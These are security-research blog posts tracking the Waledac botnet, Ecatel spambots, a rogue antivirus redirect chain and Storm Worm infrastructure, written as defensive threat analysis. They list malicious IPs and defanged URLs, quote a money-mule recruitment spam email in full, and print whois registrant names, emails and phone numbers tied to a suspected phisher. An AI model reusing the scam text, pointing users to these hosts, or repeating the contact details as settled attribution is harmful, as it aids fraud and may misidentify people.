As many of you have probably read today Microsoft initiated a large scale take down operation called “Operation b49″ to behead the Waledac Botnet.  This take down effort has definitely made a visible impact on the botnet as seen here in this recent image taken from my Waledac Botnet tracking scripts.

I applaud their efforts with this take down and now only time will tell if their strategy will have lasting impacts on this menace of a botnet.  Waledac is a peer-to-peer botnet, so simply taking out command and control servers would not have a lasting impact and the botnet would quickly recover.  By taking down the botnet at the domain (“.com”) level the individual peers within the botnet will no longer receive peering list updates, command and control instructions, and spam templates, but Waledac is resilient by design so additional actions have to occur for this take down to be completely successful and/or lasting.

The group and/or groups behind Waledac are most likely still scrambling to understand what occurred and where they went wrong, but with ties to the extinct “Storm Worm” of the past and the Zeus Trojan which has recently made the news headlines it is doubtful this will end their criminal efforts.  Time will only tell us what the groups next move will be and with that I guess I will have to find another botnet to monitor, so I will be on the look out.

KUDOS to Microsoft and the behind the scene folks within the security community that aided in this effort!

It appears that the Waledac authors have decided the share the “love” theme has worn itself out, and have updated the website template to a new theme I have titled the “Couponizer”.  This new theme is right inline with the “sharing” social engineering trickery we have grown to expect from malware authors.  This theme offers to share with you the unsuspecting website visitor money saving coupons that can only be found by downloading and installing their binary, which is really the Waledac Trojan.  So instead of them sharing money saving coupons, the end user ends up sharing their bandwidth with the Waledac authors to aid in distributing more of these money saving spam emails and other spamming campaigns.  All of this of course in done free of charge to the compromised host, unless your paying for bandwidth under a pay per usage format.  Ouch, if you are having to use one of these outdated plans as I can only hope those types plans have long disappeared for your normal residential service connections.  Imagine your phone bill if Waledac could infect your handheld device and utilize minutes on your wireless data plan.  Not a pretty picture if you ask me.

Anyways let me provide you all with a snapshot of the current web page template, so that we can send out our administrative spam warning our users not to download and install anything from a site that looks like this:

So as we can see the theme is not lacking in professionalism.  The major dead give away for this template and many of the other Waledac Trojan templates is that every item on the page is really an image.  There is really no real text, unless you count the unseen “iframe” lurking behind the scenes hosting several well structured exploits and redirections.  Back to the images, all of the images on the page are hyperlinked to a binary file, so this again is a dead give away.  We should warn our users to never install executable content from websites like this.  Hey better yet, why are we still allowing our users to install binaries anyways?  You know that if we followed the hundreds if not thousands of hardening guides found all over the Internet I am sure one of the first steps found in almost everyone of them is to remove administrator rights  from normal usage accounts and create a software distribution and installation policy.  So why are campaigns like this still so effective?  Most likely because we know what the right thing is to do, but many times there are roadblocks in the way that prevent us from implementing policies like these.  On that note, if the DOD can force you to glue your USB ports with some sort of Epoxy I would venture to say removing administrator rights from your users should be an easy accomplishment.  Now if your part of the DOD don’t go sending missiles to my house as this was just an observation, and no pun intended.

It also looks like the polymorphic generation of the Waledac binaries and the rotation of binary names we have seen since the 6th of February, which may I add was exactly 2 days after I posted that the update cycle for the Waledac binaries appeared to be ~15 hours (shame on me), is still well on it’s way to causing the best of the best Antivirus Companies and Malware detection companies to stay up late at night or just give up all together.  I definitively do not fault the Antivirus industry for this poor detection rate, as how do you create static file signatures on something that is constantly changing?  The fault of successful malware campaigns such as Waledac should lie directly on the shoulders of the system security plan authors, ITSMs, CTOs, and security professionals chartered with securing computers and networks.  Stopping Waledac is almost trivial if you will put into place a good patch management system, and take away administrative rights for general usage accounts.  Teach those that require administrative rights such as system administrators to use the “run as” functionality in Windows, it is there for a reason.  Stop making excuses on why you can’t do these things, and just do it.  I am sure you will feel the pains that all of us that have already removed our users administrator rights have felt in dealing with users that believe they need to run their daily accounts as an administrator.  Nobody said computer and network security was an easy task, so lets just buckle down and fix the fundamental issue here instead of blaming others for our problems such as the Antivirus industry.  Hmm, that sounded like a “rant”…

In the mean time if you can’t pull administrative rights feel free to utilize the Waledac Tracker on my site to put into place content filters, DNS blackholing, Firewall rules, and IDS/IPS signatures to match on content downloads or IP addresses.  I don’t think this is an effective solution, but hey sometimes you just have to make due with what you got.  On that note I have been supplying one of my favorite projects “EmergingThreats.net” IP addresses from my Waledac Tracker for IP addresses that have demonstrated some sort of activity in the last 72 hours.  Matt has put into place a mechanism to update his compromised host ruleset with these IP addresses every 24 hours, so you may want to take advantage of this and start using this projects rulesets if you don’t already.  EmergingThreats.net has come along way over the last few years, and I can say from personal experience in the IDS world their rulesets do a very good job at detecting botnets, and other malicious content that can’t be seen when only running the Snort.org VRT rulesets.  Nothing wrong with the VRT ruleset either, so I would recommend running both of these rulesets and updating constantly.

As always feel free to contact me if you have any questions or comments.

UPDATE: 22 Feb 2009 ~6:00 PM CST (GMT-6)

Much to my surprise there is a legitimate “Couponizer.com” site in which the Waledac Authors stole their latest theme from.  Give it a look-see here: The Couponizer.  I just sent the admin contact for “The Couponizer.com” website a short note letting them know their reputation is being tarnished as we speak.  Not much they can do about it except maybe put out the standard news release stating they have no involvement with the Waledac Trojan.

Ecatel’s (AS29073) BGP Issues

While I was adding some Google Charts to my SpamBot Comment tracker I noticed that SpamBots originating from the ISP and Hosting company Ecatel Network were my number one comment spam offender.  Like any other security researcher I initially performed a Google search and landed on this blog post “Atrivo, McColo and now Ecatel” by Rune at “Silent noise – about spam, trojans and other nasty stuff” which sparked my interest and lead me to diving deeper into this network.

It appears that several of Ecatel’s Network BGP peers decided to drop peering with them to include Hurricane Electric Internet Service AS6939, which from my research appeared to be their main peering point to the Internet.  The initial drop in peering caused a complete outage for Ecatel’s network, but this was short lived as they were able to obtain peering from Joint Transit.  Joint Transit appears to be their new main peering location to the Internet.  Several customers posted complainants concerning the outages on the public forum WebHosting Talk, which was also documented in Rune’s blog post.  I should also note that Ecatel still has not fully recovered and can not be reached from a few locations in the US according to this Host-Tracker report I ran while writing this blog post.  I can not reach Ecatel’s network right now through my ISP, which isn’t a bad thing.

In trying to identify what exactly occurred when the peering locations decided to stop peering with Ecatel I ran across an extremely useful tool that I had not played with before called “BGPlay” at Route Views.  Using this new toy I was able to graphically play the BGP peering route advertisements and withdrawals for the last week for any of the network subnets living on the AS29073 Ecatel Network.  Here is Ecatel’s Network before AS6939 (Hurricane) stopped peering directly with them.

As you can clearly see Ecatel’s network (AS29073) was communicating out to the Internet via the peer Hurricane (AS6939) for the large percentage of it’s traffic.  Once Hurricane (AS6939) stopped peering directly with them Ecatel scrambled to find a new main peering location which took several hours to do, but eventually they were able to pull it off.  Here is how Ecatel is peering right now:

As you can see from the image above Ecatel’s peering into the Internet is very different, but it did recover.  I am also sure Ecatel’s customers are seeing a difference in response times and through-put, as Hurricane Electric (AS6939) is ranked #46 by NetConfigs AS Rankings and  Joint Transit (AS24785) is ranked #890.

Now that Ecatel has had it’s hand slapped for harboring this collection of general badness I can only hope that they have learned their lesson and will start to clean up their network.  It is hand slaps like this that should really start getting ISPs and hosting companies attention, as a serious loss of revenue could occur if these types of actions continue to be taken.  I can only hope that the actions such as ICANN riding us of EST Domains, and the McColo and Atrivo network demise will become the norm.  These types of actions can really start to get the ball rolling in trying to clean up the Internet.  The networks that harbor this type badness really need to evaluate the costs associated with dealing with these types of customers, and the costs associated with losing Internet connectivity from actions taken against them like this.  I am sure the bad guys always pay their bills on time, but if they can’t route to the Internet I am also equally sure they will be in the same line as the good guys asking for a full refund for the services you can no longer provide.  I would also venture to say it would be more cost effective to lose a few bad customers than it would be to take a network outage with the associated bad reputation I am sure you will be labeled with.

SpamBot activities from AS29073 seen at sudosecure.net

Seventeen unique IP addresses originating from this network attempted to post 1965 spam messages since I started tracking spam with my comment spam tracker.  These IPs have been around for a while as you can see from the following table:

Note: Longevity is the number of days between the first seen date and the last seen date and not a true depiction of how long these IPs have been doing this.

Ecatel Network’s Autonomous system (AS) number is AS29073.  This AS number made up ~68% off all comment spam attempts being conducted against this blog.  Obviously the people running the actual SpamBots are not scared of being loud or standing out in a crowd.  Take a look at AS29073 vs All other AS SpamBot networks in my comment spam tracker database.

The comment spam messages being spewed out by these SpamBots varied, but I did find some interesting trends.  Seven of these IPs were either posting blank messages or garbage messages consisting of seemingly bogus domain names made of of seemingly random text strings.  Here is an example posting from my database:

Here are the 7 IPs posting these types of messages:

• 200.63.42.136
• 94.102.60.151
• 94.102.60.152
• 94.102.60.153
• 94.102.60.182
• 94.102.60.43
• 94.102.60.77

I am not exactly sure why these SpamBots would be posting such random messages, but I do have a few theories.  My guess is that these few IPs are probing SpamBots that crawl the Internet looking for Blogs, Forums, or any other website that has comment posting capabilities.  Once these probing SpamBots receive a good server response demonstrating that they are capable of posting spam to a website they most likely log the website.  These logs are then used to feed URLs to SpamBots that carry the real spam messages and badness associated with them.  Let me explain why I think this is a technique used by these spammers.  Most websites will block IPs or subscribe to SpamBot tracking databases to create these filters.  If a the SpamBot operator sends out these very loud and aggressive probing SpamBots to do the dirty work it will be these IPs that get added to the ACLs.  This will then allow the real SpamBot to operate in a more effective manner only spamming the websites that have been identified as being susceptible to spam postings.  This technique aids in keeping the real SpamBot from being placed in ACLs and Blacklists.  This also allows the SpamBot operators to accurately predict how many spam messages can be posted at any given time by their SpamBots and also aids in advertising these capabilities to the organizations that buy SpamBot time.  SpamBot operators are businessmen too, so they try to get the most out of their efforts.  Again this is just my theory and I have no real evidence that this is the actual technique being utilized here.

The next set of 3 IPs spammed pharmaceutical type messages leading to wordpress 2.5.1 templates containing pharmaceutical messages and information spam as well.  Here is a sample from one of the spam messages:

Here is a list of the 3 IPs posting similar messages:

• 200.63.42.141
• 94.102.49.14
• 94.102.60.127

The wordpress templates house some obfusticated JavaScript used to redirect the user to another website.  There is some interesting code used to ensure visitors are not being lead to this site via search engine results.  Here is the interesting portion of the code:

Basically the author of this JavaScript is checking to see if any of the major search engines is in the referrer string or if the visitor does not have a referrer string set.  If either of these conditions are true the value of “gogo” will remain false and the visitor will be presented with the “404 page not found” page.  If these conditions are false the visitor is redirected in this case to abapharm.net with a few variables being passed in the URL.  The last three messages posted from these SpamBot IPs redirected to the following domain names:

• bestcasinogroup.com
• abapharm.net
• asiatradefinance.com

These domains seem to be rotated on a regular basis and lead to either pharmaceutical websites or pay per click search redirecting.  The pharmaceutical site I was redirected to during this research was “trustedtabletsworld.com”.  Nothing real interesting there, but the pay per click search redirection sites proved to be a little more interesting.  All of the pay per click hijacking sites we redirecting through one IP:

• 64.111.196.117

A quick google search for this IP lead me to an outstanding article documenting this type of tunneling called “Double-Funnel” by a few Microsoft Security Researchers back in March of 2007.  I am not going to go into the details of how this “Double-Funnel” redirecting tunneling spam stuff works, as this article does a very good job of describing this technique and has some really interesting statistics that I would recommend reading: Spam Double-Funnel: Connecting Web Spammers with Advertisers.  That was the interesting part!

The last set of SpamBot IPs were posting porn spam messages which lead to more of this Double-Funnel pay per click search redirecting.  I noticed that this set of SpamBot IP addresses all started off with the initial JavaScript redirection pointing to “xxx.whatsdirect.cn”, which then again redirected to the actual pay per click tunneling server/site.  These two SpamBot IPs (94.102.60.166, and 94.102.60.162) had errors in the initial spam message links pointing to “xxx.whatsdirect.com” instead of “xxx.whatsdirect.cn”, so if your the paying spam customer utilizing this SpamBot provider to propagate your garbage over the Internet you may want to make sure you get a discount next time as this typo most likely caused you to lose some money.

Here is a chart to demonstrate how active the individual SpamBots are when compared to one another:

While researching the Ecatel Network (AS29073) originating SpamBots I ran across several forum posts, blog posts, and websites complaining about these IP address ranges.  I even found that several of the well know Spam Blacklists had some of these subnets completely blocked.  The Spamhaus project has some interesting listings for the Ecatel Network in which connections with Russian Malware, ROKSO Spammers, and even the recent Mac OS X Trojan DNSChanger are documented.  Here is the Spamhaus Report and Jose Nazzario’s blog post at Arbor documenting the new Mac Trojan.  Here is a link to my SpamBot Comment spam Tracker sorting out the AS29073 network which will be automatically updated as Ecatel SpamBots continue to hit this blog.

As always if you have any questons or comments regarding my postings feel free to post a comment or contact me via email.

I just recently wrote some php code to start tracking comment spam bots, which has lead to some interesting findings and statistics. The major goal for this script was to identify the most active comment spam bots by IP, but today I decided to follow some of the urls in the comment spam postings to see if any badness was waiting for me. The very first url I followed lead to the rogue Antivirus application that has been blogged about and documented heavily all over the net for about a month now and known by numerous aliases: “Antivirus 2009, Windows XP Antivirus 2009, Antivirus 2008, Antivir64, and XP Antivirus”. In the write ups I read in regards to this rogue Antivirus Software I have not really seen anything on comment spam leading to it. Most of the write ups cover email spam being sent out with catchy subject lines like “Prince Harry Proposes to Paris Hilton, Paris Hilton finds God: God issues denial, Britney Spears Sex Tape, Britney Spears Admits: My Vagina made me shave my head, and Hilton, Lohan, Spears, Duff star in Where The Boys Are remake”.

The instance of comment spam I investigated was posted by IP “189.73.10.64″ which is a host in Brazil with a reverse lookup name of ” 189-73-10-64.dsl.ctame700.brasiltelecom.net.br”. The comment spam was very simple with a message of “Nice site, Thanks” and a URL entry of “hxxp://best-savings-accounts.expectgroup.net/best-high-interest-savings-accounts.html”. I would not recommend following this URL as it leads to malicious content. Doing a simple nslookup of the best-savings-accounts.expectgroup.net returns the IP “84.16.255.84″ and doing a IP search on Malware Domain List shows this IP has been known to serve up badness: Malware Domain List search results. Both of the sites listed in the search results were linked to the Zlob Trojan. The really interesting thing about this URL was it was only a redirect to hxxp://virtualblog5.com. Doing an nslookup for virtualblog5.com returned the IP address: “84.16.252.138″ and then searching this IP address on Malware Domain List showed this IP has also been known to serve up badness as well: Malware Domain List search results. All four search results are classified as “rogue” and given the dates of this IP being reported I would have to assume this is nothing new. Virtualblog5.com was also a redirect to a virtual host on the same server hxxp://scanner-prot.com where the real badness surfaced. I was greeted with some simple javascript that identified my browser by looking at the User Agent and then rendered a pop up and redirection to hxxp://scanner.antivir-64.com. Doing an nslookup for antivir-64.com returned two IPs: “78.157.142.7″ and “91.203.92.64″. Doing the same simple searches at Malware Domain List provided the following results: 78.157.142.7 and 91.203.92.64 showed these IPs have already been identified as rogue application servers, so again nothing new here. Since this was my final destination in the crafty redirects I did some passive DNS investigations to see what other domains were being seen on these two IP address:

• antivirus2008pro-download1.com A 78.157.142.7
• antivirus2008pro-download2.com A 78.157.142.7
• antivir-64.com A 78.157.142.7
• scanner.antivir-64.com A 78.157.142.7
• antivir64.com A 78.157.142.7
• scanner.antivir64.com A 78.157.142.7
• antivirus-2008a-pro.com A 78.157.142.7
• antivirus2008t-pro.com A 78.157.142.7
• antivirus-2008y-pro.com A 78.157.142.7
• 2008pro-download1.com A 91.203.92.64
• antivirus2008pro-download2.com A 91.203.92.64
• antivir-64.com A 91.203.92.64
• scanner.antivir-64.com A 91.203.92.64
• antivir64.com A 91.203.92.64
• scanner.antivir64.com A 91.203.92.64
• antivirus-2008a-pro.com A 91.203.92.64
• antivirus2008t-pro.com A 91.203.92.64
• antivirus-2008y-pro.com A 91.203.92.64

By looking at the domain names associated with these two IPs definitely shows this comment spam I was investigating is linked to the rogue antivirus spam everyone is discussing. Getting back to the URL tracing here is a snapshot of the pop up window I received when redirected to this server:

Clicking “OK” will download the rogue antivirus software, which I would not recommend doing. Interesting enough this rogue antivirus software is very persistent in trying to get the user to install it as clicking cancel will redirect you to a fake online virus scanner shown here:

Taking a look at the source code for this page shows the list of files being shown as scanned is stored in a file called: “fileslist.js”. In this file you will find a JavaScript array containing 443 bogus file names used in the scanning animation. Also if any type of click is performed inside the browser window it will cause another pop up window shown here:

Following the instructions presented in these pop up windows will install the rogue antivrus software, but interesting enough clicking cancel and trying to close the windows will kick off another pop up window show here:

So as you can tell the rogue antivirus application web page is very persistent in trying to get the visitor to download and install it. This persistence is most likely the reason this campaign has been so widely documented as one mistake from a visitor and the badness is installed.

Now taking a look at what a visitor would see if they were to install this rogue security application. I went ahead and downloaded the binary and ran it in my sandbox. The very first installation pop up window looks very professional and presents a license agreement which even includes a limited warranty. Here is a screenshot of this license agreement pop up:

Once the “Continue” button is clicked the rogue security software is installed and the following scan window pops up:

Once the scan is completed the results are another pop up window telling the user multiple files have been found to be infected in some way or another. Here is a snapshot of the results window:

For my investigation I went ahead and choose the “protect this files now” button. Again a pop up window was presented to me showing the different license packages sold for this rogue security software seen here:

Clicking anyone of the “subscribe now” buttons presents you with the following ordering form:

Well as you can see from reading this post the comment spam I followed was definitely related to the rogue antivirus software everyone seems to be writing about or worse yet experiencing first had it’s badness. I haven’t tried to remove this infection as I did this in a sand boxed computer, but I have read many users have had success getting rid of this rogue software application by following these instructions: Bleeping Computers removal instructions.

I also ran the downloaded binary in several online sandboxes which you can check out here: VirusTotal Results 16/36 (44.45%), ThreatExpert Results, and Anubis Results.

One last thing to keep in mind about this rogue security software is that all of this is just one very large and elaborate phishing scam, so if anyone you know comes into contact with this rogue application make sure to advise them to contact their bank and/or credit card companies if they entered their personal information into the purchase form.

Sorry for the lack of coverage this month, as I have been extremely busy catching up with everything after going to Blackhat and Defcon. Anyways I spent a few hours watching the Storm Worm in my lab last night and this morning and I have identified a few changes since the last time I looked at it. First off the Storm Worm is not using it’s rootkit functionality anymore and the binary installed in the %WINDIR% is now named “neos.exe” with it’s peer hash file being named “crock+mock.config”. The p2p peer hash file contained 857 peers which is right in line with most of the samples I have taken this year. Here is the decoded IP and Port list of those peers found in my sample: peers.txt.

The Storm domain names I have that are still active or more accurately maintain a domain status of “ok”:

• nationwide2u.cn
• worldpostcardart.com
• superlettercard.com
• yourlettercard.com
• freepostcardonline.com
• digitalaudiopostcard.com
• lettercardadvertising.com
• bestlettercard.com
• audiopostcardmail.com
• supergreetingcard.com
• oldpostcardshop.com

None of these domains are resolving right now since their name servers are not answering A record requests at this time. The name servers I could identify are:

• ns.brprbgok6.com 62.33.224.26
• ns2.brprbgok6.com 124.121.82.50
• ns3.brprbgok6.com 201.212.95.89
• ns4.brprbgok6.com 89.109.28.87
• ns5.brprbgok6.com 193.238.128.177
• ns6.brprbgok6.com 74.129.81.83

Interesting enough the brprbgok6.com domain is in a “clienthold” status, so action has been taken against this domain, but that wouldn’t stop the above name servers from answering requests. Another interesting finding is that these name servers have a ttl of 172800, so they are not following the normal double fast flux structure in which the storm worm is famous for. This is not abnormal for the Storm Worm either though as this type of behavior seems to occur at the end of each campaign and can be thought of as a final stage in the limitless transformations of themes that occur. Once the name servers stop participating in the fast flux design you can almost bet on seeing a new theme within a few days. These new themes also seem to start either on Monday or Tuesday mornings, so we will just have to wait and see if this holds true one more time.

I also found that all of the domains listed at the top of this posting except for the older “nationwide2u.cn” were all registered on the same day using the same registrar and registrant information. Here is a copy of the whois record for one of the domains:

Registrar: RegTime.net Limited
Creation date: 2008-08-03
Expiration date: 2009-08-02

Registrant:
Alexey Vasiliev
Email: alexvasiliev1987@gmail.com
Organization: Alexey Vasiliev
Address: Ol. Duducha 21/2 58
City: Novosibirsk
State: NSK
ZIP: 630000
Country: RU
Phone: +7.3834427722
Fax: +7.3834427722
Administrative Contact:
Alexey Vasiliev
Email: alexvasiliev1987@gmail.com
Organization: Alexey Vasiliev
Address: Ol. Duducha 21/2 58
City: Novosibirsk
State: NSK
ZIP: 630000
Country: RU
Phone: +7.3834427722
Fax: +7.3834427722
Technical Contact:
Alexey Vasiliev
Email: alexvasiliev1987@gmail.com
Organization: Alexey Vasiliev
Address: Ol. Duducha 21/2 58
City: Novosibirsk
State: NSK
ZIP: 630000
Country: RU
Phone: +7.3834427722
Fax: +7.3834427722
Billing Contact:
Alexey Vasiliev
Email: alexvasiliev1987@gmail.com
Organization: Alexey Vasiliev
Address: Ol. Duducha 21/2 58
City: Novosibirsk
State: NSK
ZIP: 630000
Country: RU
Phone: +7.3834427722
Fax: +7.3834427722

The registrar is Regtime.net Limited a Russian ICANN accredited registrar that has been in business since 2001. This is also the first time I have seen the Storm authors use Regtime.net Limited for registering their domains. Hopefully Regtime.net will take action against these domain names soon as the “love/postcard” theme seems to be the fall back theme for Storm when new themes begin to lose effectiveness.

The Storm spam seems to be right inline with the norm with one small exception. This exception is a phishing email that is going out concerning money laundering. Here is a copy of the email message I captured:

Subject: JOB $1800/WEEK – CANADIANS WANTED!
Date: Fri, 15 Aug 2008 16:27:29 -0500
MIME-Version: 1.0
Content-Type: text/plain;
format=flowed;
charset=”Windows-1252″;
reply-type=original
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4133.2499
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2499

We are looking for canadians who would like to work from home
in an administrative support function for businesses.
Many of our clients are small businesses and executives
who are busy and on the go.

Administrative Assistants can work full or part time.
PART TIME ASSISTANTS must work a minimum of 10 hours per week.

Salary varies between $5,000 to $10,000 per month!

If interested,
get back to me at

hxxp://www.vik-budget.com

thank you

.
QUIT

Following the link in the email message will bring you to a phpBB forum posting dated Thu Dec 02, 2004 8:30 pm with a subject line of “Getting Started!” by the moderator of the forum going by alias “Supplier” with a total of 34 posts on this message board. This all seemed really odd to me as I have suggested in the past that individuals were paying for spam, but why would someone pay for spam on such an old outdated posting? Interesting enough the vik-budget.com domain seems to be utilizing a fast flux design as well rotating out A records every 180 seconds serving up 17 individual IP addresses at a time. Here is a sample dig output just to clarify what I am trying to say:

;; QUESTION SECTION:
;vik-budget.com. IN A

;; ANSWER SECTION:
vik-budget.com. 180 IN A 86.104.87.45
vik-budget.com. 180 IN A 89.33.209.220
vik-budget.com. 180 IN A 93.81.55.7
vik-budget.com. 180 IN A 89.112.76.91
vik-budget.com. 180 IN A 89.47.118.38
vik-budget.com. 180 IN A 91.124.247.62
vik-budget.com. 180 IN A 93.80.234.159
vik-budget.com. 180 IN A 82.179.235.165
vik-budget.com. 180 IN A 79.112.24.125
vik-budget.com. 180 IN A 190.20.206.241
vik-budget.com. 180 IN A 92.100.98.229
vik-budget.com. 180 IN A 89.45.24.174
vik-budget.com. 180 IN A 92.100.21.65
vik-budget.com. 180 IN A 89.178.231.167
vik-budget.com. 180 IN A 81.181.112.38
vik-budget.com. 180 IN A 69.144.198.226

I went ahead and searched all of these IP addresses against ~180,000 archived IP addresses I have identified in the last six months that may have been associated with the Storm worm at some point in the past. The only one that returned a match against my database was “69.144.198.226″, so I don’t think this phishing phpBB site is operating on the Storm fast flux network, but I could be wrong. The name servers are also different for this phishing domain, so again I don’t think it is operating on the Storm fast flux network. Here is a list of the name servers for vik-budget.com:

• NS1.VIPSAM.COM
• NS2.VIPSAM.COM
• NS3.VIPSAM.COM
• NS4.VIPSAM.COM

One really cool discovery I had concerning these name servers is they seem to be riding a fast flux network using a ttl of 180 seconds at first, but when that initial ttl expires a new ttl of 172800 is seen and the A record changes to a new IP address. Very odd stuff here, so I dug into the VIPSAM.COM domain and found it no longer resolves, but was used back in July to point to another online pharmaceutical site titled: “Online Pharmacy”. This seems to be another very active and large pharmaceutical spam participant with 70 other domain names currently resolving to this host and at least 63 other hosts sharing it’s name servers. Here is a screen shot of this pharmaceutical company website to give you an idea of what it currently looks like:

As you can tell this was all very odd to me, and was actually the first time I was lead to an online pharmaceutical spam site from a money laundering phishing site. I can’t say the two are owned and operated by the same person or organization, but only linked by name servers and shared hosting. I will let you be the judge of that.

Now getting back to the vik-budget.com phishing forum site. Here is a screen capture of the forum post that is presented by following the link in the Storm spam message:

So as you can see it looks like a money laundering scheme in which the poster claims this to be good and legal way of making money. I am not a layer or agent of the law, but this just doesn’t seem like it would be a good and legal way of making money. So I did a little digging and found this exact forum structure to include identical forum content could be found on other domains such as hdd-manager.com, WCA-Manager.com, xrs-capital.com, and can-budget.com. With all of the content being identical I would venture to say this is most likely a phpBB template in which the phisher simply changes the domain name and it modifies everything inside the forum to reflect this change such as his or her email address. Looking into the whois records for these sites all 4 domains hdd-manager.com, wca-manager.com, xrs-capital.com, and can-budget.com were created on March 11, 2008 with matching information registrant information. Here is an the whois record for wca-manager.com:

Domain Name………. WCA-Manager.com
Creation Date…….. 2008-03-11 10:22:01
Registration Date…. 2008-03-11 10:22:01
Expiry Date………. 2009-03-11 10:22:01
Organisation Name…. xiaowen
Organisation Address. No.12 chang’an road
Organisation Address.
Organisation Address. Beijing
Organisation Address. 100001
Organisation Address. BJ
Organisation Address. CN

Admin Name……….. gr wen
Admin Address…….. No.12 chang’an road
Admin Address……..
Admin Address…….. Beijing
Admin Address…….. 100001
Admin Address…….. BJ
Admin Address…….. CN
Admin Email………. 3498@34.com
Admin Phone………. +86.103093034
Admin Fax………… +86.103493934

Tech Name………… gr wen
Tech Address……… No.12 chang’an road
Tech Address………
Tech Address……… Beijing
Tech Address……… 100001
Tech Address……… BJ
Tech Address……… CN
Tech Email……….. 3498@34.com
Tech Phone……….. +86.103093034
Tech Fax…………. +86.103493934

Bill Name………… gr wen
Bill Address……… No.12 chang’an road
Bill Address………
Bill Address……… Beijing
Bill Address……… 100001
Bill Address……… BJ
Bill Address……… CN
Bill Email……….. 3498@34.com
Bill Phone……….. +86.103093034
Bill Fax…………. +86.103493934
Name Server………. ns4.nsi-centre.com
Name Server………. ns3.nsi-centre.com
Name Server………. ns2.nsi-centre.com
Name Server………. ns1.nsi-centre.com

Now the whois record for vik-budget.com wasn’t an exact match, but I am sure you can spot the similarities between the two:

Domain Name………. vik-budget.com
Creation Date…….. 2008-07-23 17:34:04
Registration Date…. 2008-07-23 17:34:04
Expiry Date………. 2009-07-23 17:34:04
Organisation Name…. xiaowen
Organisation Address. No.12 chan’an road
Organisation Address.
Organisation Address. Beijing
Organisation Address. 100001
Organisation Address. BJ
Organisation Address. CN

Admin Name……….. xiaowen
Admin Address…….. No.12 chan’an road
Admin Address……..
Admin Address…….. Beijing
Admin Address…….. 100001
Admin Address…….. BJ
Admin Address…….. CN
Admin Email………. 232@242.com
Admin Phone………. +86.102092094
Admin Fax………… +86.102482940

Tech Name………… xiaowen
Tech Address……… No.12 chan’an road
Tech Address………
Tech Address……… Beijing
Tech Address……… 100001
Tech Address……… BJ
Tech Address……… CN
Tech Email……….. 232@242.com
Tech Phone……….. +86.102092094
Tech Fax…………. +86.102482940

Bill Name………… xiaowen
Bill Address……… No.12 chan’an road
Bill Address………
Bill Address……… Beijing
Bill Address……… 100001
Bill Address……… BJ
Bill Address……… CN
Bill Email……….. 232@242.com
Bill Phone……….. +86.102092094
Bill Fax…………. +86.102482940
Name Server………. ns4.vipsam.com
Name Server………. ns3.vipsam.com
Name Server………. ns2.vipsam.com
Name Server………. ns1.vipsam.com

I also did so checking into the ICQ number which seems to be legitimate: supplier, I didn’t try contacting this person for some social engineering, but I sure thought about it. I believe this to be the administrator or operator behind this scam as his ICQ number is the only thing that never changes in this template. In my digging I also ran across a post at scamfraudalert.com where an administrator posted this same email template under the work-at-home scam section of their forums back in July: scamfraudalert.com posting. A little more Google magic and I was able to uncover even more information about this money laundering scam which seems to have been around for over a year now: forum.419eater.com cs-funds and forum.419.com lvs-money.com.

The last thing I noticed in regards to the vik-budget.com domain was it was currently being hosted on the same host as these two PhishTank reported phishing sites: hsbc.update.citapedor.com, and update.citapedor.com, which were phishing sites targeting the HSBC bank back in mid July as far as I can tell. Could this be the same phisher? Well I will let you be the judge again by simply posting the whois record for citapedor.com:

Domain Name………. citapedor.com
Creation Date…….. 2008-07-10 20:19:29
Registration Date…. 2008-07-10 20:19:29
Expiry Date………. 2009-07-10 20:19:29
Organisation Name…. xiaowen
Organisation Address. No.12 chan’an road
Organisation Address.
Organisation Address. Beijing
Organisation Address. 100001
Organisation Address. BJ
Organisation Address. CN

Admin Name……….. xiaowen
Admin Address…….. No.12 chan’an road
Admin Address……..
Admin Address…….. Beijing
Admin Address…….. 100001
Admin Address…….. BJ
Admin Address…….. CN
Admin Email………. 232@242.com
Admin Phone………. +86.102092094
Admin Fax………… +86.102482940

Tech Name………… xiaowen
Tech Address……… No.12 chan’an road
Tech Address………
Tech Address……… Beijing
Tech Address……… 100001
Tech Address……… BJ
Tech Address……… CN
Tech Email……….. 232@242.com
Tech Phone……….. +86.102092094
Tech Fax…………. +86.102482940

Bill Name………… xiaowen
Bill Address……… No.12 chan’an road
Bill Address………
Bill Address……… Beijing
Bill Address……… 100001
Bill Address……… BJ
Bill Address……… CN
Bill Email……….. 232@242.com
Bill Phone……….. +86.102092094
Bill Fax…………. +86.102482940
Name Server………. ns2.godns1334.com
Name Server………. ns1.godns1334.com
Name Server………. ns3.godns1334.com
Name Server………. ns4.godns1334.com

So if your seeing what I am seeing I would be fairly certain this is the same person or organization responsible for the past phishing attempts. I just have to wonder why they would use the same false information to register domains. If any of this really interests you I would suggest Googleing using these suggested strings: “No.12 chang’an road”, “xiaowen phisher”, and “Organisation Name xiaowen” which should provide you with an overall picture of just how long this phisher has been around and just how many different types of phishing scams this phisher has attempted with out being caught to include ebay, paypal, facebook, linkedin, and numerous financial institution phishing sites. With unique whois records being the center of my little investigation it is almost dumbfounding to think we can’t put a stop to at least this one individual or organization.

The only other spam I saw coming out of the Storm worm was the normal Pharmacy express and Canadian pharmacy stuff. I have noticed the Canadian Pharmacy spam is riding a little more complex fast flux network and makes up about 75% of all the spam coming from Storm Worm infected hosts. Here is a list of the domain names I captured during this analysis:

• areatry.com
• boardcow.com
• boughttool.com
• claimtie.com
• drawbe.com
• groupyellow.com
• pitchinclude.com
• presentalso.com
• probablewide.com
• whetherthus.com

Here is a sample dig query against one of the domains “areatry.com”:

;; ANSWER SECTION:
areatry.com. 120 IN A 89.139.42.151
areatry.com. 120 IN A 89.142.143.19
areatry.com. 120 IN A 89.169.184.21
areatry.com. 120 IN A 91.66.127.14
areatry.com. 120 IN A 118.168.25.176
areatry.com. 120 IN A 210.194.144.198
areatry.com. 120 IN A 213.211.44.132
areatry.com. 120 IN A 218.171.174.108
areatry.com. 120 IN A 218.190.85.230
areatry.com. 120 IN A 59.188.130.110
areatry.com. 120 IN A 61.224.205.217
areatry.com. 120 IN A 69.66.219.190
areatry.com. 120 IN A 75.139.130.32
areatry.com. 120 IN A 77.41.88.195
areatry.com. 120 IN A 77.127.162.69
areatry.com. 120 IN A 79.164.122.160
areatry.com. 120 IN A 79.172.80.138
areatry.com. 120 IN A 85.250.12.186
areatry.com. 120 IN A 85.250.27.81
areatry.com. 120 IN A 89.110.48.125

;; AUTHORITY SECTION:
